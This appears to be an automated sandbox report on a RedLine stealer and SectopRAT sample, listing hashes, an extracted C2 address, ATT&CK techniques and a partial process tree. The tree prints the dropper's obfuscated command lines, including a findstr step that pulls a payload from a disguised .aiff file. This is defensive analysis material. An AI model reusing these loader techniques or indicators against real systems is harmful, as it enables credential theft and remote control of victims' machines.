redline | 02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-12-2024 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34807a743f2d680eef051852eaef0b16.exe
Size

4.1MB
MD5

34807a743f2d680eef051852eaef0b16
SHA1

4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256

02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
SHA512

65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
SSDEEP

98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF

Score

10^/10

redline sectoprat adsbb defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

adsbb

21jhss.club:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2388-53-0x0000000000BC0000-0x0000000000BDC000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/2388-53-0x0000000000BC0000-0x0000000000BDC000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1524	net.exe
948	net1.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
63	4548	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2456	powershell.exe
1732	powershell.exe
4752	powershell.exe
4656	powershell.exe
4752	powershell.exe
3208	powershell.exe
3988	powershell.exe
2312	powershell.exe
1244	powershell.exe
3784	powershell.exe
3148	powershell.exe
768	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4308	netsh.exe
3772	netsh.exe
4644	netsh.exe
2916	netsh.exe
4360	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	34807a743f2d680eef051852eaef0b16.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 14 IoCs

pid	Process
3744	Rifiutare.exe.com
2820	Rifiutare.exe.com
2912	Uno.exe.com
2432	Uno.exe.com
3168	Inebriato.exe.com
1484	Inebriato.exe.com
2388	RegAsm.exe
3316	RegAsm.exe
1952	RegAsm.exe
4204	RDPWInst.exe
3744	RDPWInst.exe
3484	RDPWInst.exe
2952	RDPWInst.exe
5044	RDPWInst.exe

Loads dropped DLL 3 IoCs

pid	Process
3544	svchost.exe
4632	svchost.exe
4932	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihndaincdhndmcjhefpbkcaoijcjehnd\5657\manifest.json	RegAsm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
63	raw.githubusercontent.com
55	raw.githubusercontent.com
56	raw.githubusercontent.com
61	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/1952-79-0x0000000000C00000-0x0000000000DDF000-memory.dmp	autoit_exe
behavioral2/memory/1952-82-0x0000000000C00000-0x0000000000DDF000-memory.dmp	autoit_exe
behavioral2/memory/1952-84-0x0000000000C00000-0x0000000000DDF000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\bQDOnCDXpo = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\bQDOnCDXpo = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2820 set thread context of 2388	2820	Rifiutare.exe.com	104
PID 2432 set thread context of 3316	2432	Uno.exe.com	105
PID 1484 set thread context of 1952	1484	Inebriato.exe.com	106

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files\RDP Wrapper	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1872	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rifiutare.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rifiutare.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	makecab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	34807a743f2d680eef051852eaef0b16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4140	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4304	timeout.exe
4476	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4140	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
432	schtasks.exe
1436	schtasks.exe
4996	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	63	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
3316	RegAsm.exe
3316	RegAsm.exe
4752	powershell.exe
4752	powershell.exe
3784	powershell.exe
3784	powershell.exe
2456	powershell.exe
2456	powershell.exe
3148	powershell.exe
3148	powershell.exe
768	powershell.exe
768	powershell.exe
3208	powershell.exe
3208	powershell.exe
1732	powershell.exe
1732	powershell.exe
2312	powershell.exe
2312	powershell.exe
3544	svchost.exe
3544	svchost.exe
3544	svchost.exe
3544	svchost.exe
4632	svchost.exe
4632	svchost.exe
4632	svchost.exe
4632	svchost.exe
1244	powershell.exe
1244	powershell.exe
3988	powershell.exe
3988	powershell.exe
4752	powershell.exe
4752	powershell.exe
4656	powershell.exe
4656	powershell.exe
4932	svchost.exe
4932	svchost.exe
4932	svchost.exe
4932	svchost.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2388	RegAsm.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	3148	powershell.exe
Token: SeIncreaseQuotaPrivilege	2248	WMIC.exe
Token: SeSecurityPrivilege	2248	WMIC.exe
Token: SeTakeOwnershipPrivilege	2248	WMIC.exe
Token: SeLoadDriverPrivilege	2248	WMIC.exe
Token: SeSystemProfilePrivilege	2248	WMIC.exe
Token: SeSystemtimePrivilege	2248	WMIC.exe
Token: SeProfSingleProcessPrivilege	2248	WMIC.exe
Token: SeIncBasePriorityPrivilege	2248	WMIC.exe
Token: SeCreatePagefilePrivilege	2248	WMIC.exe
Token: SeBackupPrivilege	2248	WMIC.exe
Token: SeRestorePrivilege	2248	WMIC.exe
Token: SeShutdownPrivilege	2248	WMIC.exe
Token: SeDebugPrivilege	2248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2248	WMIC.exe
Token: SeRemoteShutdownPrivilege	2248	WMIC.exe
Token: SeUndockPrivilege	2248	WMIC.exe
Token: SeManageVolumePrivilege	2248	WMIC.exe
Token: 33	2248	WMIC.exe
Token: 34	2248	WMIC.exe
Token: 35	2248	WMIC.exe
Token: 36	2248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2248	WMIC.exe
Token: SeSecurityPrivilege	2248	WMIC.exe
Token: SeTakeOwnershipPrivilege	2248	WMIC.exe
Token: SeLoadDriverPrivilege	2248	WMIC.exe
Token: SeSystemProfilePrivilege	2248	WMIC.exe
Token: SeSystemtimePrivilege	2248	WMIC.exe
Token: SeProfSingleProcessPrivilege	2248	WMIC.exe
Token: SeIncBasePriorityPrivilege	2248	WMIC.exe
Token: SeCreatePagefilePrivilege	2248	WMIC.exe
Token: SeBackupPrivilege	2248	WMIC.exe
Token: SeRestorePrivilege	2248	WMIC.exe
Token: SeShutdownPrivilege	2248	WMIC.exe
Token: SeDebugPrivilege	2248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2248	WMIC.exe
Token: SeRemoteShutdownPrivilege	2248	WMIC.exe
Token: SeUndockPrivilege	2248	WMIC.exe
Token: SeManageVolumePrivilege	2248	WMIC.exe
Token: 33	2248	WMIC.exe
Token: 34	2248	WMIC.exe
Token: 35	2248	WMIC.exe
Token: 36	2248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4636	WMIC.exe
Token: SeSecurityPrivilege	4636	WMIC.exe
Token: SeTakeOwnershipPrivilege	4636	WMIC.exe
Token: SeLoadDriverPrivilege	4636	WMIC.exe
Token: SeSystemProfilePrivilege	4636	WMIC.exe
Token: SeSystemtimePrivilege	4636	WMIC.exe
Token: SeProfSingleProcessPrivilege	4636	WMIC.exe
Token: SeIncBasePriorityPrivilege	4636	WMIC.exe
Token: SeCreatePagefilePrivilege	4636	WMIC.exe
Token: SeBackupPrivilege	4636	WMIC.exe
Token: SeRestorePrivilege	4636	WMIC.exe
Token: SeShutdownPrivilege	4636	WMIC.exe
Token: SeDebugPrivilege	4636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4636	WMIC.exe
Token: SeRemoteShutdownPrivilege	4636	WMIC.exe
Token: SeUndockPrivilege	4636	WMIC.exe
Token: SeManageVolumePrivilege	4636	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2808 wrote to memory of 2424	2808	34807a743f2d680eef051852eaef0b16.exe	83
PID 2808 wrote to memory of 2424	2808	34807a743f2d680eef051852eaef0b16.exe	83
PID 2808 wrote to memory of 2424	2808	34807a743f2d680eef051852eaef0b16.exe	83
PID 2808 wrote to memory of 2916	2808	34807a743f2d680eef051852eaef0b16.exe	85
PID 2808 wrote to memory of 2916	2808	34807a743f2d680eef051852eaef0b16.exe	85
PID 2808 wrote to memory of 2916	2808	34807a743f2d680eef051852eaef0b16.exe	85
PID 2916 wrote to memory of 2252	2916	cmd.exe	87
PID 2916 wrote to memory of 2252	2916	cmd.exe	87
PID 2916 wrote to memory of 2252	2916	cmd.exe	87
PID 2252 wrote to memory of 1708	2252	cmd.exe	89
PID 2252 wrote to memory of 1708	2252	cmd.exe	89
PID 2252 wrote to memory of 1708	2252	cmd.exe	89
PID 2252 wrote to memory of 3744	2252	cmd.exe	90
PID 2252 wrote to memory of 3744	2252	cmd.exe	90
PID 2252 wrote to memory of 3744	2252	cmd.exe	90
PID 3744 wrote to memory of 2820	3744	Rifiutare.exe.com	91
PID 3744 wrote to memory of 2820	3744	Rifiutare.exe.com	91
PID 3744 wrote to memory of 2820	3744	Rifiutare.exe.com	91
PID 2252 wrote to memory of 2184	2252	cmd.exe	92
PID 2252 wrote to memory of 2184	2252	cmd.exe	92
PID 2252 wrote to memory of 2184	2252	cmd.exe	92
PID 2252 wrote to memory of 2912	2252	cmd.exe	94
PID 2252 wrote to memory of 2912	2252	cmd.exe	94
PID 2252 wrote to memory of 2912	2252	cmd.exe	94
PID 2912 wrote to memory of 2432	2912	Uno.exe.com	95
PID 2912 wrote to memory of 2432	2912	Uno.exe.com	95
PID 2912 wrote to memory of 2432	2912	Uno.exe.com	95
PID 2252 wrote to memory of 3760	2252	cmd.exe	96
PID 2252 wrote to memory of 3760	2252	cmd.exe	96
PID 2252 wrote to memory of 3760	2252	cmd.exe	96
PID 2252 wrote to memory of 3168	2252	cmd.exe	98
PID 2252 wrote to memory of 3168	2252	cmd.exe	98
PID 2252 wrote to memory of 3168	2252	cmd.exe	98
PID 3168 wrote to memory of 1484	3168	Inebriato.exe.com	99
PID 3168 wrote to memory of 1484	3168	Inebriato.exe.com	99
PID 3168 wrote to memory of 1484	3168	Inebriato.exe.com	99
PID 2252 wrote to memory of 4140	2252	cmd.exe	100
PID 2252 wrote to memory of 4140	2252	cmd.exe	100
PID 2252 wrote to memory of 4140	2252	cmd.exe	100
PID 2820 wrote to memory of 2388	2820	Rifiutare.exe.com	104
PID 2820 wrote to memory of 2388	2820	Rifiutare.exe.com	104
PID 2820 wrote to memory of 2388	2820	Rifiutare.exe.com	104
PID 2820 wrote to memory of 2388	2820	Rifiutare.exe.com	104
PID 2820 wrote to memory of 2388	2820	Rifiutare.exe.com	104
PID 2432 wrote to memory of 3316	2432	Uno.exe.com	105
PID 2432 wrote to memory of 3316	2432	Uno.exe.com	105
PID 2432 wrote to memory of 3316	2432	Uno.exe.com	105
PID 1484 wrote to memory of 1952	1484	Inebriato.exe.com	106
PID 1484 wrote to memory of 1952	1484	Inebriato.exe.com	106
PID 1484 wrote to memory of 1952	1484	Inebriato.exe.com	106
PID 2432 wrote to memory of 3316	2432	Uno.exe.com	105
PID 2432 wrote to memory of 3316	2432	Uno.exe.com	105
PID 1484 wrote to memory of 1952	1484	Inebriato.exe.com	106
PID 1484 wrote to memory of 1952	1484	Inebriato.exe.com	106
PID 1952 wrote to memory of 2092	1952	RegAsm.exe	118
PID 1952 wrote to memory of 2092	1952	RegAsm.exe	118
PID 1952 wrote to memory of 2092	1952	RegAsm.exe	118
PID 2092 wrote to memory of 4752	2092	cmd.exe	120
PID 2092 wrote to memory of 4752	2092	cmd.exe	120
PID 2092 wrote to memory of 4752	2092	cmd.exe	120
PID 1952 wrote to memory of 2516	1952	RegAsm.exe	121
PID 1952 wrote to memory of 2516	1952	RegAsm.exe	121
PID 1952 wrote to memory of 2516	1952	RegAsm.exe	121
PID 2516 wrote to memory of 3784	2516	cmd.exe	123

C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe
"C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:1708
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
      Rifiutare.exe.com D
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3744
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2820
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2388
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:2184
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
      Uno.exe.com f
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2912
